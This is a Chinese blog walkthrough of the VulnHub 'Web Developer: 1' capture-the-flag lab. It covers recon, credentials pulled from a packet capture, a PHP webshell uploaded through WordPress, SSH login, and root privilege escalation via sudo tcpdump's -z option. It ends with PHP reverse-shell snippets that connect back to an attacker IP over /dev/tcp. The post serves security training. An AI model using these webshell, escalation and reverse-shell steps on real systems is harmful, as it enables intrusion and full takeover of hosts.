webdeveloper靶场渗透实操手册

最新推荐文章于 2024-01-25 23:15:44 发布
最新推荐文章于 2024-01-25 23:15:44 发布
阅读量160 收藏 1
点赞数 1
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79441798/article/details/134462636
版权

kali IP : 192.168.46.128

用nmap扫出靶机ip

在扫出开放的端口

接着dirb扫描一下目录

扫描完之后可以发现有一个ipdata的网站

用wireshark打开可以找到后台的账号和密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

接着登入后台

登入之后发现又文件上传漏洞

上传一个一句话木马 php文件

上传好了之后 打开upload目录找一下刚刚上传的文件

IP/wp-content/uploads/2023

找到我们刚刚上传的php文件打开

然后用蚁剑链接这个网站可以找到web的账号密码

在kali里面登录

 ssh webdeveloper@192.168.96.132

账号:webdeveloper

密码:MasterOfTheUniverse

我们可以发现登录成功了

然后直接查看flag的话因为没有权限所以查不到

我们用tcpdump提权

sudo -l

输入刚才的密码 MasterOfTheUniverse

可以看到tcpdump的目录

创建攻击文件

touch /tmp/exploit

写入shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

赋予可执行权限

chmod +x /tmp/exploit

利用tcpdump执行任意命令

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令
-G [rotate_seconds] 每秒一次的频率执行-w指定的转储
-W [num] 指定抓包数量

回车就可以看到flag啦~

反弹shell

常见的php反弹shell代码

$sock=fsockopen($ip,$port);
exec("/bin/sh -i <&3 >&3 2>&3");


<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/10086 0>&1'");
?>
Jamey-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场WEB DEVELOPER: 1
kukudeshuo的博客
12-21 914
vulnhub靶场WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
【甄选靶场】Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)
人间体佐菲的博客
10-02 1040
Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权) 信息安全,网络安全,渗透测试
vulnhub靶场WEB DEVELOPER:1——新手进阶2
最新发布
m0_75051044的博客
01-25 1901
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
Web安全攻防靶场WebGoat8 - Developer Tools
u013650297的博客
01-22 401
Web安全攻防靶场WebGoat8 - Developer Tools Developer Tools 谷歌浏览器开发工具 使用谷歌浏览器F12 打开控制台Console tab 在控制台选项卡中,您可以看到加载的JavaScript文件可能已经打印到其中的任何内容。如果你看到红色的东西不要担心。虽然这是一个错误,但它可能已经自行解决了。通过console选项卡,您还可以运行自己的JavaScript代码行 在首先使用快捷键CTRL+L清除console 在控制台中输入js webgoat.custom
wevedeveloper靶机渗透
aarong的博客
12-15 2958
1、 发现目标 (netdiscover),找到WebDeveloper的IP地址。 ​ 2、 利用NMAP扫描目标主机,发现目标主机端口开放、服务情况。 nmap -Pn 192.168.65.1/24 #查看同网段所有主机对应开放端口和服务 从中判断出靶机的IP以及对应的端口和服务情况。 开放了 22端口(SSH远程登录服务)、80端口(HTTP服务) nmap -sV 192.168.65.130 #扫描靶机具体服务信息、服务版本信息 3、 若目标主机提供了HTTP服务,尝试利用浏览器
Web Developer 0.5.4.zip
09-13
标题 "Web Developer 0.5.4.zip" 暗示了这是一个针对Web开发者设计的工具,具体来说,它是一个浏览器扩展程序。该版本为0.5.4,表明它是软件的某个更新版本,可能包含了错误修复、新功能或者性能改进。 描述中提到...
Web Developer 2.0.2 简体中文版
11-22
Web Developer 是一款能在浏览器中添加各种Web开发功能的深受欢迎的工具。自 Firefox 57.0 发布以来,以往旧式的扩展已不兼容,因此,Web Developer 的原作者发布了新版本,以支持新的 Web Extension 扩展技术,但...
IE WebDeveloper V2带注册码
08-25
**IE WebDeveloper V2** 是一款专为Internet Explorer设计的网页开发者工具,它极大地便利了前端开发者在IE浏览器上进行网页调试和优化工作。这款工具提供了丰富的功能,包括元素检查、CSS编辑、HTML查看以及...
webDeveloper中文版
08-22
webDeveloper中文版,火狐插件
IE Webdeveloper v2.4.1 破解码
07-22
IE 中的 firebug , 别的不多说 你懂的 好用刚刚的
WebDeveloper内网渗透流程(新手流程梳理)
qq_30889301的博客
03-12 905
webdeveloper简单的内网渗透流程。
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3690
1JAVA环境。
这是一份网络靶场入门攻略
Innocence_0的博客
11-24 921
网络靶场(Cyber Range)是一个供5方角色协同使用的网络系统仿真平台。用于支撑网络安全人才培养、网络攻防训练、安全产品评测和网络新技术验证。网络安全人员要就攻防技术进行训练、演练;一项新的网络技术要试验,不能在互联网上进行(造成不可逆的破坏),于是需要建立网络靶场,把网络的要素虚拟到网络靶场。网络靶场—|—目的为真实对抗提供训练场所环境虚拟网络环境功能用于网络攻防演练优势资源可反复利用对于目标伤害程度可控靶场演练数据可监控与评估。
小白的靶机VulnHub-Web Developer
热门推荐
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
Vulnhub靶机渗透测试实战(二):Web Developer: 1
weixin_41038469的博客
03-18 3232
靶机下载地址: https://www.vulnhub.com/entry/webdeveloper-1,288/ 攻击机ip: 172.20.10.5 经过主机发现 靶机ip地址: 172.20.10.11 上传shellcode 发现后台有更改插件代码的功能,选择Plugins-&amp;amp;gt;Editor 选择要更改的插件:Hello Dolly 上传shellcode,以获得反弹shell fso...
Web Developer中文版下载
weixin_34049032的博客
10-18 432
Web Developer是一款非常优秀的网页调试工具。Web Developer有IE和Firefox两个版本,主要功能表现在几个重要的方面:对页面中的文本、图像、媒体文件进行控制,对网页所应用的CSS文件的id与class辅助查看,表格辅助查看,可以实现修改CSS文件实时显示出得到的页面效果等等。Web Developer插件能够帮助我们对CSS网站进行分析,我们使用FF对网页进行浏览,运用W...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值